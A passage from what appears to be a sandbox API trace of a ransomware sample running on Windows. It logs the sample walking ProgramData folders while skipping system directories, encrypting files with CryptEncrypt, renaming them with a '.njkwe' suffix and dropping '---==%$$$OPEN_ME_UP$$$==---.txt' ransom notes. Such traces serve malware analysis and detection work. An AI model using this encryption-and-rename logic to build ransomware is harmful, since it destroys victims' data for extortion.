lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.570] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.570] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.570] GetProcessHeap () returned 0xbe0000 [0072.570] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.570] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.570] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.571] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.571] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.571] CloseHandle (hObject=0x434) returned 1 [0072.571] GetProcessHeap () returned 0xbe0000 [0072.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.571] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man_r00t_{3sXlE5}.njkwe") returned 118 [0072.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man_r00t_{3sxle5}.njkwe")) returned 1 [0072.572] GetProcessHeap () returned 0xbe0000 [0072.572] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.572] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42b4f7c0, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x42b4f7c0, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x244f1ded, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9bddd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="wordEtw.man", cAlternateFileName="")) returned 1 [0072.572] lstrcmpiW (lpString1="wordEtw.man", lpString2="Windows") returned 1 [0072.572] lstrcmpiW (lpString1="wordEtw.man", lpString2="$Recycle.bin") returned 1 [0072.572] lstrcmpiW (lpString1="wordEtw.man", lpString2="System Volume Information") returned 1 [0072.572] lstrcmpiW (lpString1="wordEtw.man", lpString2="Program Files") returned 1 [0072.572] lstrcmpiW (lpString1="wordEtw.man", lpString2="Program Files (x86)") returned 1 [0072.572] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man") returned 90 [0072.572] StrStrIW (lpFirst="wordEtw.man", lpSrch=".njkwe") returned 0x0 [0072.572] lstrcmpW (lpString1="wordEtw.man", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.572] lstrcmpW (lpString1="wordEtw.man", lpString2="taridd") returned 1 [0072.572] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.572] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.573] GetTickCount () returned 0x1152816 [0072.573] GetTickCount () returned 0x1152816 [0072.573] GetTickCount () returned 0x1152816 [0072.573] GetTickCount () returned 0x1152816 [0072.574] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.574] GetProcessHeap () returned 0xbe0000 [0072.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.574] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.576] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.578] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.578] GetProcessHeap () returned 0xbe0000 [0072.578] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.578] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.578] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.581] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.581] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.581] CloseHandle (hObject=0x434) returned 1 [0072.581] GetProcessHeap () returned 0xbe0000 [0072.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.581] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man_r00t_{3sXlE5}.njkwe") returned 110 [0072.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man_r00t_{3sxle5}.njkwe")) returned 1 [0072.584] GetProcessHeap () returned 0xbe0000 [0072.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.585] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42b4f7c0, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x42b4f7c0, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x244f1ded, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9bddd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="wordEtw.man", cAlternateFileName="")) returned 0 [0072.585] FindClose (in: hFindFile=0xc1a1a0 | out: hFindFile=0xc1a1a0) returned 1 [0072.585] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 110 [0072.585] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0072.586] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0072.591] CloseHandle (hObject=0x430) returned 1 [0072.591] GetProcessHeap () returned 0xbe0000 [0072.591] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0072.591] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49bee514, ftCreationTime.dwHighDateTime=0x1d32745, ftLastAccessTime.dwLowDateTime=0x3b87bb60, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b87bb60, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0072.592] FindClose (in: hFindFile=0xc1a320 | out: hFindFile=0xc1a320) returned 1 [0072.592] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 71 [0072.592] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0072.592] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0072.595] CloseHandle (hObject=0x42c) returned 1 [0072.595] GetProcessHeap () returned 0xbe0000 [0072.595] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0072.595] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x77356b64, ftLastAccessTime.dwHighDateTime=0x1d32793, ftLastWriteTime.dwLowDateTime=0x77356b64, ftLastWriteTime.dwHighDateTime=0x1d32793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Crypto", cAlternateFileName="")) returned 1 [0072.595] lstrcmpiW (lpString1="Crypto", lpString2="Windows") returned -1 [0072.595] lstrcmpiW (lpString1="Crypto", lpString2="$Recycle.bin") returned 1 [0072.595] lstrcmpiW (lpString1="Crypto", lpString2="System Volume Information") returned -1 [0072.595] lstrcmpiW (lpString1="Crypto", lpString2="Program Files") returned -1 [0072.595] lstrcmpiW (lpString1="Crypto", lpString2="Program Files (x86)") returned -1 [0072.595] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto") returned 35 [0072.595] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0072.595] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0072.595] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.595] GetProcessHeap () returned 0xbe0000 [0072.595] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0072.595] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*") returned 37 [0072.595] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x77356b64, ftLastAccessTime.dwHighDateTime=0x1d32793, ftLastWriteTime.dwLowDateTime=0x77356b64, ftLastWriteTime.dwHighDateTime=0x1d32793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a320 [0072.596] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.596] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.596] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.596] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.596] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.596] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\.") returned 37 [0072.596] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.596] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x77356b64, ftLastAccessTime.dwHighDateTime=0x1d32793, ftLastWriteTime.dwLowDateTime=0x77356b64, ftLastWriteTime.dwHighDateTime=0x1d32793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.596] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.596] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.596] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.596] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.596] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.596] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\..") returned 38 [0072.596] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.596] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.596] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x42e812c9, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x42e812c9, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DSS", cAlternateFileName="")) returned 1 [0072.596] lstrcmpiW (lpString1="DSS", lpString2="Windows") returned -1 [0072.596] lstrcmpiW (lpString1="DSS", lpString2="$Recycle.bin") returned 1 [0072.596] lstrcmpiW (lpString1="DSS", lpString2="System Volume Information") returned -1 [0072.596] lstrcmpiW (lpString1="DSS", lpString2="Program Files") returned -1 [0072.596] lstrcmpiW (lpString1="DSS", lpString2="Program Files (x86)") returned -1 [0072.596] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS") returned 39 [0072.597] lstrcmpW (lpString1="DSS", lpString2=".") returned 1 [0072.597] lstrcmpW (lpString1="DSS", lpString2="..") returned 1 [0072.597] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.597] GetProcessHeap () returned 0xbe0000 [0072.597] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0072.597] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*") returned 41 [0072.597] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x42e812c9, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x42e812c9, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e20 [0072.597] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.597] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.597] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.597] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.597] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.597] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\.") returned 41 [0072.597] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.597] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x42e812c9, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x42e812c9, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.597] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.597] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.597] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.597] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.597] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.597] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\..") returned 42 [0072.597] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.598] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.598] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd330d8b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0072.598] lstrcmpiW (lpString1="MachineKeys", lpString2="Windows") returned -1 [0072.598] lstrcmpiW (lpString1="MachineKeys", lpString2="$Recycle.bin") returned 1 [0072.598] lstrcmpiW (lpString1="MachineKeys", lpString2="System Volume Information") returned -1 [0072.598] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files") returned -1 [0072.598] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files (x86)") returned -1 [0072.598] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 51 [0072.598] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1 [0072.598] lstrcmpW (lpString1="MachineKeys", lpString2="..") returned 1 [0072.598] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.598] GetProcessHeap () returned 0xbe0000 [0072.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.598] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*") returned 53 [0072.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd330d8b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1e0 [0072.599] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.599] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.599] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.599] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.599] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.599] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\.") returned 53 [0072.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.599] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd330d8b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.599] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.599] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.599] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.599] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.599] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.600] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\..") returned 54 [0072.600] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.600] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd330d8b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0072.600] FindClose (in: hFindFile=0xc1a1e0 | out: hFindFile=0xc1a1e0) returned 1 [0072.600] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 83 [0072.600] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\machinekeys\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.601] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0072.602] CloseHandle (hObject=0x434) returned 1 [0072.602] GetProcessHeap () returned 0xbe0000 [0072.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.602] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, 